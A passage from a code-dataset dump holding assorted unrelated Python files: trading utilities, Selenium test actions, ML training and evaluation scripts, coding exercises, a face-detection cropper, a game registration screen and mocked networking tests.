granularity_str == \"S10\":\n return 10\n elif granularity_str == \"S15\":\n return 15\n elif granularity_str == \"S30\":\n return 30\n elif granularity_str == \"M1\":\n return 60\n elif granularity_str == \"M2\":\n return 60 * 2\n elif granularity_str == \"M3\":\n return 60 * 3\n elif granularity_str == \"M4\":\n return 60 * 4\n elif granularity_str == \"M5\":\n return 60 * 5\n elif granularity_str == \"M10\":\n return 60 * 10\n elif granularity_str == \"M15\":\n return 60 * 15\n elif granularity_str == \"M30\":\n return 60 * 30\n elif granularity_str == \"H1\":\n return 60 * 60 * 1\n elif granularity_str == \"H2\":\n return 60 * 60 * 2\n elif granularity_str == \"H3\":\n return 60 * 60 * 3\n elif granularity_str == \"H4\":\n return 60 * 60 * 4\n elif granularity_str == \"H8\":\n return 60 * 60 * 8\n elif granularity_str == \"H12\":\n return 60 * 60 * 12\n elif granularity_str == \"D1\":\n return 60 * 60 * 24 * 1\n else:\n raise LookupError(\"Unable to convert granularity to seconds\")\n\n\ndef calc_profit_loss(home_currency, instrument, units, side, open_price, close_price):\n \"\"\"\n Calculate the profit/loss\n :param home_currency:\n :param instrument:\n :param units:\n :param side:\n :param open_price:\n :param close_price:\n :return:\n \"\"\"\n # Exapmle: AUD/USD -> BASE/QUOTE\n base_currency = instrument[:3]\n quote_currency = instrument[4:]\n\n if side == 'SELL':\n profit_loss = units * (open_price - close_price)\n elif side == 'BUY':\n profit_loss = units * (close_price - open_price)\n else:\n raise Exception(\"Expecting a side of 'BUY' or 'SELL' when calculating profit/loss.\")\n\n if quote_currency == home_currency: # EUR_USD, GBP_USD (home currency in the second position)\n # PL = UNITS * (OPEN - CLOSE)\n return profit_loss\n elif base_currency == home_currency: # USD_JPY, USD_CAD (home currency in the first position)\n # PL = (UNITS * (OPEN - CLOSE)) / CLOSE\n return profit_loss / close_price\n else:\n raise Exception('Cannot handle this currency pair. Pair does not contain the home currency.')\n\n\ndef calculate_position_size(instrument, home_currency, open_price, stop_loss, dollar_amount_to_risk):\n # Exapmle: AUD/USD -> BASE/QUOTE\n base_currency = instrument[:3]\n quote_currency = instrument[4:]\n\n one_r = dollar_amount_to_risk\n if quote_currency == home_currency: # '???_USD'\n # UNITS = PL / (OPEN - CLOSE)\n return one_r / (math.fabs(open_price - stop_loss))\n elif base_currency == home_currency: # 'USD_???'\n # UNITS = (PL * CLOSE) / (OPEN - CLOSE)\n return (one_r * stop_loss) / (math.fabs(open_price - stop_loss))\n else:\n raise Exception('Cannot handle this currency pair. Pair does not contain the home currency.')","sub_path":"utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":4474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"644122137","text":"\"\"\"\nAn action to enter text into an input field. An actor must possess the\nability to BrowseTheWeb to perform this action. An actor performs this\naction like so:\n\n the_actor.attempts_to(\n Enter.the_text(\"Hello!\").into_the(GREETINGS_INPUT)\n )\n\n the_actor.attempts_to(\n Enter.the_text(\"Bye!\").into_the(CHAT_INPUT).then_hit(Keys.ENTER)\n )\n\"\"\"\n\n\nfrom functools import partial\nfrom typing import List, Union\n\nfrom selenium.common.exceptions import WebDriverException\nfrom selenium.webdriver.common.action_chains import ActionChains\n\nfrom ..actor import Actor\nfrom ..exceptions import DeliveryError, UnableToAct\nfrom ..pacing import aside, beat\nfrom ..target import Target\nfrom .base_action import BaseAction\nfrom .hold_down import KEY_NAMES\n\n\nclass Enter(BaseAction):\n \"\"\"\n Enter text into an input field. An Enter action is expected to be\n instantiated by its static |Enter.the_text| method. A typical\n invocation might look like:\n\n Enter.the_text(\"Hello world!\").into_the(COMMENT_FIELD)\n\n It can then be passed along to the |Actor| or added to a |Chain| to\n perform the action.\n \"\"\"\n\n text: str\n target: Union[None, Target]\n following_keys: List[str]\n\n @staticmethod\n def the_text(text: str) -> \"Enter\":\n \"\"\"\n Provide the text to enter in to the field. It is expected the next\n call will be to the instantiated Enter object's |Enter.into| method.\n\n Args:\n text: the text to enter into the |Target|.\n\n Returns:\n |Enter|\n \"\"\"\n return Enter(text)\n\n the_keys = the_text\n\n @staticmethod\n def the_secret(text: str) -> \"Enter\":\n \"\"\"\n Provide the text to enter into the field, but note that the text\n should be masked in the log. The text will appear as \"[CENSORED]\".\n It is expected that the next call will be to the instantiated Enter\n object's |Enter.into| method.\n\n Args:\n text: the text to enter into the |Target|, but it's a secret.\n\n Returns:\n |Enter|\n \"\"\"\n return Enter(text, mask=True)\n\n the_password = the_secret\n\n def into_the(self, target: Target) -> \"Enter\":\n \"\"\"\n Specify the target to enter the text into. This is most likely an\n input field.\n\n Args:\n target: The |Target| describing the input field.\n\n Returns:\n |Enter|\n \"\"\"\n self.target = target\n return self\n\n on = into = into_the\n\n def then_hit(self, *keys: str) -> \"Enter\":\n \"\"\"\n Supply additional keys to hit after entering the text, for example if\n the keyboard ENTER key should be pressed.\n\n Args:\n keys: the keys to hit afterwards. These are probably the\n constants from Selenium's |Keys|, but can also be a string.\n\n Returns:\n |Enter|\n \"\"\"\n self.following_keys.extend(keys)\n return self\n\n then_press = then_hit\n\n @beat(\"{0} enters '{text_to_log}' into the {target}.\")\n def perform_as(self, the_actor: Actor) -> None:\n \"\"\"\n Direct the actor to enter the text into the targeted input field. If\n this Enter object's |Enter.then_hit| method was called, it will also\n hit the supplied keys.\n\n Args:\n the_actor: the |Actor| who will perform this action.\n\n Raises:\n |DeliveryError|: an exception was raised by Selenium.\n |UnableToAct|: no target was supplied.\n |UnableToPerform|: the actor does not have the ability to\n |BrowseTheWeb|.\n \"\"\"\n if self.target is None:\n raise UnableToAct(\n \"Target was not supplied for Enter. Provide a target by using either \"\n \"the .into(), .into_the(), or .on() method.\"\n )\n\n element = self.target.found_by(the_actor)\n\n try:\n element.send_keys(self.text)\n for key in self.following_keys:\n aside(f\"then hits the {key} key\")\n element.send_keys(key)\n except WebDriverException as e:\n msg = (\n \"Encountered an issue while attempting to enter text into \"\n f\"{self.target}: {e.__class__.__name__}\"\n )\n raise DeliveryError(msg).with_traceback(e.__traceback__)\n\n @beat(\" Enter the text {text_to_log} into the {target}!\")\n def add_to_chain(self, the_actor: Actor, the_chain: ActionChains) -> None:\n \"\"\"\n Add the Enter action to an in-progress |Chain| of actions.\n\n Args:\n the_actor: the |Actor| who will be performing the action chain.\n the_chain: the |ActionChains| instance that is being built.\n \"\"\"\n if self.target is None:\n send_keys = the_chain.send_keys\n else:\n element = self.target.found_by(the_actor)\n send_keys = partial(the_chain.send_keys_to_element, element)\n\n send_keys(self.text)\n for key in self.following_keys:\n send_keys(key)\n\n def __init__(self, text: str, mask: bool = False) -> None:\n self.text = text\n self.target = None\n self.following_keys = []\n\n if mask:\n self.text_to_log = \"[CENSORED]\"\n else:\n altered_text = text\n for value, keyname in KEY_NAMES.items():\n altered_text = altered_text.replace(value, keyname)\n self.text_to_log = altered_text\n","sub_path":"screenpy/actions/enter.py","file_name":"enter.py","file_ext":"py","file_size_in_byte":5505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"607824812","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport numpy as np\nimport model\nfrom monitor import napmonitor\n\nmodel_dir = './model2/'\nmnist = input_data.read_data_sets(\"mnist_data\", one_hot=True)\n\nx = tf.placeholder(tf.float32, [None, 784])\ny_ = tf.placeholder(tf.float32, [None, 10])\nimage = tf.reshape(x, [-1, 28, 28, 1])\nkeep_prob = tf.placeholder(tf.float32)\ny, _ = model.model3(image, keep_prob)\n\ncorrect_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\nsess = tf.Session()\nsaver = tf.train.Saver()\nsaver.restore(sess, tf.train.latest_checkpoint(model_dir))\nprint('restore succeed.')\n\ntest_images1 = mnist.test.images[:, :]\ntest_labels1 = mnist.test.labels[:, :]\n\n# print(y.eval(session=sess, feed_dict={x: test_images1, y_: test_labels1, keep_prob: 1.0}))\nprint('Accuracy of the network on the 10000 test images: {} %'.format(100 * accuracy.eval(session=sess, feed_dict={x: test_images1, y_: test_labels1, keep_prob: 1.0})))\n\n# test_images2 = mnist.test.images[5000:, :]\n# test_labels2 = mnist.test.labels[5000:, :]\n#\n# #print(y.eval(session=sess, feed_dict={x: test_images2, y_: test_labels2, keep_prob: 1.0}))\n# print(accuracy.eval(session=sess, feed_dict={x: test_images2, y_: test_labels2, keep_prob: 1.0}))\n\nsess.close()\n","sub_path":"evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"442503972","text":"class Solution(object):\n def lastRemaining(self, n):\n head = 1\n step = 1\n remain = n\n status = True\n while remain > 1:\n if status or remain % 2 == 1:\n head += step\n step *= 2\n remain /= 2\n status = not status\n return head\n \n#time limited\n#1\nclass Solution(object):\n def lastRemaining(self, n):\n a = list(range(1, n+1))\n cnt = 0\n while (len(a) > 1):\n if cnt % 2 == 0:\n a = [a[i] for i, v in enumerate(a) if i % 2 == 1]\n cnt += 1\n a = list(reversed(a))\n else:\n a = [a[i] for i, v in enumerate(a) if i % 2 == 1]\n a = list(reversed(a))\n cnt += 1\n return a[0]\n \n#2\nclass Solution(object):\n def lastRemaining(self, n):\n nums = [i for i in range(1, n+1)]\n left_to_right = True\n while(len(nums) > 1):\n if left_to_right:\n nums = nums[1::2]\n left_to_right = False\n else:\n nums = nums[-2::-2][::-1]\n left_to_right = True\n return nums[0]\n \n#3\ndef lastRemaining(self, n):\n a = list(range(1, n+1))\n cnt = 0\n while (len(a) > 1):\n if cnt % 2 == 0:\n a = [a[i] for i, v in enumerate(a) if i % 2 == 1]\n cnt += 1\n else:\n if len(a) % 2 == 1:\n a = [a[i] for i, v in enumerate(a) if i % 2 == 1]\n else:\n a = [a[i] for i, v in enumerate(a) if i % 2 == 0]\n cnt += 1\n return a[0]\n","sub_path":"python/390 Elimination Game.py","file_name":"390 Elimination Game.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"327146307","text":"# 2. Write a program that reads the length of the base and the height of a right-angled triangle and prints\n# the area. Every number is given on a separate line.\n\n\ndef formula(): #function is used\n base=float(input('Enter the Base of right-angled triangle : ')) #user input\n height=float(input('Enter the height of right-angled triangle : ')) #user input\n\n area_of_RAT=(1/2)*base*height #formula fto calculate the area of triangle\n\n return area_of_RAT\n\nprint(formula()) #call the fuction for output\n\n\n","sub_path":"Lab_Exercise_1/Lab_Exercise_1_Solutions/lab1 Q2.py","file_name":"lab1 Q2.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"646398530","text":"c = int(input())\nli = []\nfor i in range(c):\n\tli.append(input().split(\" \"))\n\tfor j in range(len(li[i])):\n\t\tli[i][j] = int(li[i][j])\n\nfor i in range(c):\n\tfor j in range(1,min(li[i])+1):\n\t\tif(li[i][0] % j == 0 and li[i][1] % j == 0):\n\t\t\tgcd = j\n\n\tlcm = int((li[i][0] * li[i][1]) / gcd)\n\n\tprint(lcm, gcd)","sub_path":"2702.py","file_name":"2702.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"137273559","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/tests/test_utils.py\n# Compiled at: 2013-07-27 09:03:17\nfrom pymills.utils import notags\n\ndef test_notags():\n s = 'foo'\n x = notags(s)\n assert x == 'foo'","sub_path":"pycfiles/pymills-3.4.2-py2.7/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"227640606","text":"import csv\nimport os\nimport json\nimport sys\nimport pandas as pd\nimport gridfs\nfrom cr.db.store import global_settings, connect\n\n\ndef load_data(filename, settings=None, clear=None):\n if settings is None:\n settings = global_settings\n global_settings.update(json.load(file(sys.argv[1])))\n\n db = connect(settings)\n\n obj_name = os.path.basename(filename).split('.')[0]\n\n collection = getattr(db, obj_name)\n\n if clear:\n collection.remove()\n\n with file(filename) as the_file:\n objs = json.load(the_file)\n for obj in objs:\n collection.insert(obj)\n\n\ndef load_bulk_data(filename, settings=None, clear=None):\n if settings is None:\n settings = global_settings\n global_settings.update(json.load(file(sys.argv[1])))\n\n db = connect(settings)\n\n obj_name = os.path.basename(filename).split('.')[0]\n\n collection = getattr(db, obj_name)\n\n if clear:\n collection.remove()\n\n with file(filename) as the_file:\n objs = json.load(the_file)\n collection.insert_many(objs)\n\n\ndef load_dataset(csv_filename, db, h=None):\n '''\n Requirements: pandas\n Using pandas to load the csv file (chunk size is useful when file is big),\n all the field will be automatically casted to the right type of data.\n '''\n\n file_csv = pd.read_csv(csv_filename, header=h, chunksize=1000)\n\n for df in file_csv:\n\n gender_unique = {v: k for k, v in enumerate(df.iloc[:, -1].unique())}\n df.iloc[:, -1] = df.iloc[:, -1].apply(lambda x: gender_unique[x] if x != None else gender_unique[\n x]) # this produce an int64 type on gender column\n\n categorical = df.select_dtypes(include='object').apply(\n pd.factorize) # Encode the object as an enumerated type or categorical variable (integer values).\n bools = df.select_dtypes(include='bool') # Cast boolenas to bool\n others = df.select_dtypes(exclude=['bool', 'object']) # get all the other columns of the dataframe\n\n headers = list(categorical.index) + list(bools.columns) + list(others.columns)\n\n columns = [a[0].tolist() for a in categorical.values] + \\\n [list(bools[col]) for col in bools] + \\\n [list(others[col]) for col in others]\n\n data = {'headers': headers,\n 'columns': columns\n }\n\n return db.datasets.insert(data)\n","sub_path":"cr-db/cr/db/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"416469169","text":"import dlib\r\nimport cv2\r\nimport os\r\n\r\ninput_folder = 'D:\\\\CBSR_database\\\\test_release\\\\test_release'\r\noutput_folder = 'D:\\\\Face'\r\n\r\ncount = 0\r\n\r\nfor root, dirs, files in os.walk(input_folder):\r\n for f in files:\r\n\r\n cap = cv2.VideoCapture(root+\"\\\\\"+f) # 開啟影片檔案\r\n\r\n width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\r\n height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT)) # 取得畫面尺寸\r\n\r\n detector = dlib.get_frontal_face_detector() # Dlib的人臉偵測器\r\n\r\n face_filename = 1\r\n\r\n cap.read()\r\n last_frame = cap.get(cv2.CAP_PROP_FRAME_COUNT)\r\n frame_counter = 1\r\n\r\n while cap.isOpened() and frame_counter < last_frame: # 以迴圈從影片檔案讀取影格,並顯示出來\r\n ret, frame = cap.read()\r\n\r\n # 偵測人臉\r\n face_rects, scores, idx = detector.run(frame, 0)\r\n\r\n # 取出所有偵測的結果\r\n for i, d in enumerate(face_rects):\r\n\r\n x1 = d.left()\r\n y1 = d.top()\r\n x2 = d.right()\r\n y2 = d.bottom()\r\n # 以方框標示偵測的人臉\r\n\r\n crop_img = frame[y1-100:y2+100, x1-100:x2+100]\r\n cv2.imwrite(output_folder + '\\\\' + f + \"_{0}.png\".format(face_filename), crop_img)\r\n\r\n cv2.rectangle(frame, (x1, y1), (x2, y2), (0, 255, 0), 4, cv2.LINE_AA)\r\n\r\n face_filename += 1\r\n frame_counter += 1\r\n\r\n cv2.imshow('Face Detection', frame) # 顯示結果\r\n\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()\r\n","sub_path":"face_good/video_catch3.py","file_name":"video_catch3.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"109339398","text":"# Copyright 2014 Google Inc. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport unittest2\n\n_DATASET_ID = 'DATASET'\n_KIND = 'KIND'\n_ID = 1234\n\n\nclass TestEntity(unittest2.TestCase):\n\n def setUp(self):\n from gcloud.datastore import _implicit_environ\n self._replaced_dataset_id = _implicit_environ.DATASET_ID\n _implicit_environ.DATASET_ID = None\n\n def tearDown(self):\n from gcloud.datastore import _implicit_environ\n _implicit_environ.DATASET_ID = self._replaced_dataset_id\n\n def _getTargetClass(self):\n from gcloud.datastore.entity import Entity\n return Entity\n\n def _makeOne(self, key=None, exclude_from_indexes=()):\n klass = self._getTargetClass()\n return klass(key=key, exclude_from_indexes=exclude_from_indexes)\n\n def test_ctor_defaults(self):\n klass = self._getTargetClass()\n entity = klass()\n self.assertEqual(entity.key, None)\n self.assertEqual(entity.kind, None)\n self.assertEqual(sorted(entity.exclude_from_indexes), [])\n\n def test_ctor_explicit(self):\n _EXCLUDE_FROM_INDEXES = ['foo', 'bar']\n key = _Key()\n entity = self._makeOne(\n key=key, exclude_from_indexes=_EXCLUDE_FROM_INDEXES)\n self.assertEqual(sorted(entity.exclude_from_indexes),\n sorted(_EXCLUDE_FROM_INDEXES))\n\n def test___repr___no_key_empty(self):\n entity = self._makeOne()\n self.assertEqual(repr(entity), '')\n\n def test___repr___w_key_non_empty(self):\n key = _Key()\n key._path = '/bar/baz'\n entity = self._makeOne(key=key)\n entity['foo'] = 'Foo'\n self.assertEqual(repr(entity), \"\")\n\n\nclass _Key(object):\n _MARKER = object()\n _key = 'KEY'\n _partial = False\n _path = None\n _id = None\n _stored = None\n\n def __init__(self, dataset_id=_DATASET_ID):\n self.dataset_id = dataset_id\n\n @property\n def path(self):\n return self._path\n","sub_path":"gcloud/datastore/test_entity.py","file_name":"test_entity.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"242153324","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom random import randint\nimport numpy as np\nimport utils\nimport os\nimport time\nimport readin\nimport mynet\n\ndef get_accu(out_prob,real_label,bs):\n count=0\n for i in range(bs):\n temp=0.0\n maxp=0\n for j in range(12):\n if temp0)and(epoch%4==0) :\n# del optimizer\n# lr=lr/2\n# optimizer=torch.optim.SGD(net.parameters(),lr)\n \n for step in range(12):\n # read in the data\n train_data = readin.read_part_image(train_data_dir,step*1000,1000)\n train_label= readin.read_part_xml(train_label_dir,step*1000,1000)\n print(train_data.size(),train_data.type())\n train_label=train_label[:,0]\n train_data=train_data.to(device)\n train_label=train_label.to(device)\n \n step_loss=0.0\n for iter in range(iter_num):\n if iter>0 :\n del indices\n del minibatch_data\n del minibatch_label\n del inputs\n del prob\n del log_prob\n del loss\n \n # create a minibatch\n indices=iter*bs\n minibatch_data = train_data[indices:indices+bs]\n minibatch_label= train_label[indices:indices+bs]\n minibatch_data=minibatch_data.to(device)\n minibatch_label=minibatch_label.to(device)\n \n # feed the input to the net\n inputs=minibatch_data\n inputs.requires_grad_()\n prob=net(inputs)\n \n # update the weights\n log_prob=torch.log(prob)\n loss=criterion(log_prob, minibatch_label)\n #loss=criterion(prob, minibatch_label)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n step_loss=step_loss+loss.item()\n record.write(\"\\nbatch no.\"+str(step*iter_num+iter)+\" loss: \"+'{0:.4f}'.format(loss.item())+\" time: \"+'{0:.2f}'.format(time.time()-start_time))\n \n del train_data\n del train_label\n del indices\n del minibatch_data\n del minibatch_label\n del inputs\n del prob\n del log_prob\n del loss\n print(\"step loss: \",step_loss/iter_num)\n record.write(\"\\nstep loss: \"+'{0:.4f}'.format(step_loss/iter_num))\n \n small_data = readin.read_part_image(small_data_dir,0,1740)\n small_label= readin.read_part_xml(small_label_dir,0,1740)\n small_label=small_label[:,0]\n small_data=small_data.to(device)\n small_label=small_label.to(device)\n small_loss=0.0\n accu_count=0\n for iter in range(int(1740/bs)):\n if iter>0 :\n del indices\n del minibatch_data\n del minibatch_label\n del inputs\n del prob\n del log_prob\n del loss\n \n # create a minibatch\n indices=iter*bs\n minibatch_data = small_data[indices: indices+bs]\n minibatch_label= small_label[indices: indices+bs]\n minibatch_data=minibatch_data.to(device)\n minibatch_label=minibatch_label.to(device)\n #print(minibatch_label.type())\n \n # feed the input to the net\n inputs=minibatch_data\n prob=net(inputs)\n \n # get the accuracy\n accu_count=accu_count+get_accu(prob,minibatch_label,bs)\n \n # get the loss\n log_prob=torch.log(prob)\n loss=criterion(log_prob, minibatch_label)\n #loss=criterion(prob, minibatch_label)\n small_loss=small_loss+loss.item()\n \n del indices\n del minibatch_data\n del minibatch_label\n del inputs\n del prob\n del loss \n del small_data\n del small_label\n print(\"small loss:\",small_loss/87,\"accuracy:\",accu_count/1740)\n record.write(\"small loss:\"+'{0:.4f}'.format(small_loss/87)+\" accuracy:\"+'{0:.4f}'.format(accu_count/1740))\n \n net_name=origname+\"_epoch_\"+str(epoch)+\".pt\"\n torch.save(net.state_dict(),net_name)\nrecord.close()\n\n\n","sub_path":"server/train_simplynet_V2_lr005.py","file_name":"train_simplynet_V2_lr005.py","file_ext":"py","file_size_in_byte":4745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"106067286","text":"\"\"\"1021. 个位数统计 (15)给定一个k位整数N = dk-1*10k-1 + ... +\nd1*101 + d0 (0<=di<=9, i=0,...,k-1,\ndk-1>0),请编写程序统计每种不同的个位数字出现的次数。例如:给定N = 100311,\n则有2个0,3个1,和1个3。\n输入格式:\n每个输入包含1个测试用例,即一个不超过1000位的正整数N。\n输出格式:\n对N中每一种不同的个位数字,以D:M的格式在一行中输出该位数字D及其在N中出现的次数M。要求按D的升序输出。\"\"\"\n\ninput = list(input())\n\ncount_dict = {i: 0 for i in range(10)}\nfor item in input:\n count_dict[int(item)] += 1\n\nfor num, count in count_dict.items():\n if count != 0:\n print(\"%d:%d\" % (int(num), count))\n\nexit(0)\n\n#note: the dict type is a checked point.\n","sub_path":"pat-b-practise/1021.py","file_name":"1021.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"391185590","text":"from telas.JanelaPadrao import JanelaPadrao\r\nfrom PPlay.gameimage import GameImage\r\nfrom PPlay.sprite import *\r\nfrom componentes.botao import *\r\nfrom PPlay.mouse import Mouse\r\nfrom componentes.campoTexto import CampoTexto\r\nfrom componentes.campoSenha import CampoSenha\r\nimport pygame\r\nfrom servico.Login import cadastro\r\nfrom constant import *\r\n\r\n\"\"\"botão provisorio preciso ser refeito com componente\"\"\"\r\nclass Cadastro(JanelaPadrao):\r\n def __init__(self, janela):\r\n super().__init__(janela)\r\n self.bg = GameImage(image_file=\"./assets/imagem/tela_inicial/fundo.png\")\r\n self.bg.set_scale(self.janela.width , self.janela.height)\r\n\r\n self.loginCampo = CampoTexto(janela,\r\n GameImage(\"assets/imagem/cadastro/informe_email.png\"),\r\n janela.width/2 - 320, 180, 640, 60)\r\n\r\n self.usernameCampo = CampoTexto(janela,\r\n GameImage(\"assets/imagem/cadastro/informe_nome_usuario.png\"),\r\n janela.width/2 - 320, 300, 640, 60)\r\n\r\n self.senhaCampo = CampoSenha(janela,\r\n GameImage(\"assets/imagem/cadastro/defina_senha.png\"),\r\n janela.width/2 - 320, 420, 640, 60)\r\n\r\n self.confirmaSenhaCampo = CampoSenha(janela,\r\n GameImage(\"assets/imagem/cadastro/confirme_senha.png\"),\r\n janela.width/2 - 320, 540, 640, 60)\r\n\r\n botao_sprite = Sprite(\"assets/imagem/cadastro/botao_cadastrar.png\")\r\n botao_selecionado_sprite = Sprite(\"assets/imagem/cadastro/botao_cadastrar_select.png\")\r\n self.botao = Botao(botao_sprite, botao_selecionado_sprite, estados[\"cadastro\"])\r\n altura_botao = self.confirmaSenhaCampo.y + self.confirmaSenhaCampo.height + 25\r\n self.botao.setposition(self.janela.width/2 - self.botao.width/2, altura_botao)\r\n #self.botao = pygame.Rect([480,490,320,60])\r\n\r\n self.barra_superior = GameImage(\"assets/imagem/barra_superior_geral.png\")\r\n\r\n self.titulo_janela = GameImage(\"assets/imagem/cadastro/letrero_cadastro.png\")\r\n self.titulo_janela.set_position(50, self.barra_superior.height/2 - self.titulo_janela.height/2)\r\n\r\n sprite_x = Sprite(\"assets/imagem/historico/icon_x.png\")\r\n self.botao_x = Botao(sprite_x, sprite_x, 20)\r\n self.botao_x.setposition(self.janela.width- self.botao_x.width-15, 15)\r\n \r\n\r\n def loop(self):\r\n\r\n self.janela.input_pygame = True\r\n\r\n clicou_cadastro = False\r\n mouse = Mouse()\r\n\r\n while True:\r\n\r\n self.draw()\r\n\r\n saiu = self.botao_x.update()\r\n if saiu:\r\n self.janela.input_pygame = False\r\n return estados[\"menu_inicial\"], None\r\n\r\n cadastrar = self.botao.update()\r\n if cadastrar:\r\n clicou_cadastro = True\r\n\r\n if clicou_cadastro and not mouse.is_button_pressed(1):\r\n if self.confirmaSenhaCampo.texto == self.senhaCampo.texto:\r\n clicou_cadastro = False\r\n sucesso, resultado = cadastro(self.loginCampo.texto, self.usernameCampo.texto, self.senhaCampo.texto)\r\n if not sucesso:\r\n print(resultado)\r\n else:\r\n self.janela.input_pygame = False\r\n return estados[\"menu_logado\"], resultado\r\n \r\n self.janela.update()\r\n\r\n def draw(self):\r\n super().draw()\r\n self.bg.draw()\r\n self.barra_superior.draw()\r\n self.titulo_janela.draw()\r\n self.botao_x.render()\r\n self.loginCampo.draw()\r\n self.usernameCampo.draw()\r\n self.confirmaSenhaCampo.draw()\r\n self.senhaCampo.draw()\r\n self.botao.render()\r\n #pygame.draw.rect(self.janela.get_screen(), (200,15,51),self.botao)\r\n\r\n def evento(self, e):\r\n super().evento(e)\r\n self.usernameCampo.evento(e)\r\n self.loginCampo.evento(e)\r\n self.senhaCampo.evento(e)\r\n self.confirmaSenhaCampo.evento(e)\r\n","sub_path":"WAR/telas/Cadastro.py","file_name":"Cadastro.py","file_ext":"py","file_size_in_byte":4213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"50279558","text":"from unittest import TestCase, skip\nfrom unittest.mock import patch, Mock, call\nimport pickle\n\nfrom .table_mock import TableMock\n\n\ndef create_g_mock():\n return TableMock({\n 'net': TableMock({\n 'Start': Mock(name='net.Start'),\n 'WriteUInt': Mock(name='net.WriteUInt'),\n 'WriteData': Mock(name='net.WriteData'),\n 'Send': Mock(name='net.Send'),\n 'SendToServer': Mock(name='net.SendToServer'),\n 'WriteType': Mock(name='net.WriteType'),\n }),\n 'Player': Mock(name='Player'),\n 'CLIENT': True\n })\n\n\n@patch('gmod.lua.G', new_callable=create_g_mock)\nclass SendTestCase(TestCase):\n def test_wrong_message_type_name(self, g):\n from gmod import realms\n\n realms.CLIENT = False\n realms.SERVER = True\n\n from gmod.net import send\n\n with self.assertRaises(TypeError):\n send(123, 1)\n\n def test_no_receiver(self, g):\n from gmod import realms\n\n realms.CLIENT = False\n realms.SERVER = True\n\n from gmod.net import send\n\n with self.assertRaises(ValueError):\n send('spam', 1, 2)\n\n def test_from_client(self, g):\n from gmod import realms\n\n realms.CLIENT = True\n realms.SERVER = False\n\n from gmod.net import send\n\n data = (1, 2, 3)\n pickled = pickle.dumps(data, pickle.HIGHEST_PROTOCOL)\n\n send('spam', *data)\n\n g.net.Start.assert_called_once_with('spam')\n g.net.WriteUInt.assert_called_once_with(len(pickled), 32)\n g.net.WriteData.assert_called_once_with(pickled, len(pickled))\n g.net.SendToServer.assert_called_once()\n\n def test_from_server(self, g):\n from gmod import realms\n\n realms.CLIENT = False\n realms.SERVER = True\n\n from gmod.net import send\n from gmod import player\n\n data = (2, 3, 4)\n pickled = pickle.dumps(data, pickle.HIGHEST_PROTOCOL)\n ply = player.get_by_userid(1)\n\n send('eggs', *data, receiver=ply)\n\n g.net.Start.assert_called_once_with('eggs')\n g.net.WriteUInt.assert_called_once_with(len(pickled), 32)\n g.net.WriteData.assert_called_once_with(pickled, len(pickled))\n g.net.Send.assert_called_once_with(ply)\n\n def test_no_data(self, g):\n from gmod import realms\n\n realms.CLIENT = True\n realms.SERVER = False\n\n from gmod.net import send\n\n pickled = pickle.dumps((), pickle.HIGHEST_PROTOCOL)\n\n send('foo')\n\n g.net.Start.assert_called_once_with('foo')\n g.net.WriteUInt.assert_called_once_with(len(pickled), 32)\n g.net.WriteData.assert_called_once_with(pickled, len(pickled))\n g.net.SendToServer.assert_called_once()\n\n @skip('Support of cross-language net messages is postponed')\n def test_to_lua(self, g):\n from gmod import realms\n\n realms.CLIENT = True\n realms.SERVER = False\n\n from gmod.net import send\n\n send('foo', 5, 6, handled_in_lua=True)\n\n g.net.Start.assert_called_once_with('foo')\n g.net.WriteType.assert_has_calls([call(5), call(6)])\n g.net.SendToServer.assert_called_once()\n\n\n@patch('gmod.lua.G', new_callable=create_g_mock)\nclass DefaultReceiverTestCase(TestCase):\n def test_normal(self, g):\n from gmod import 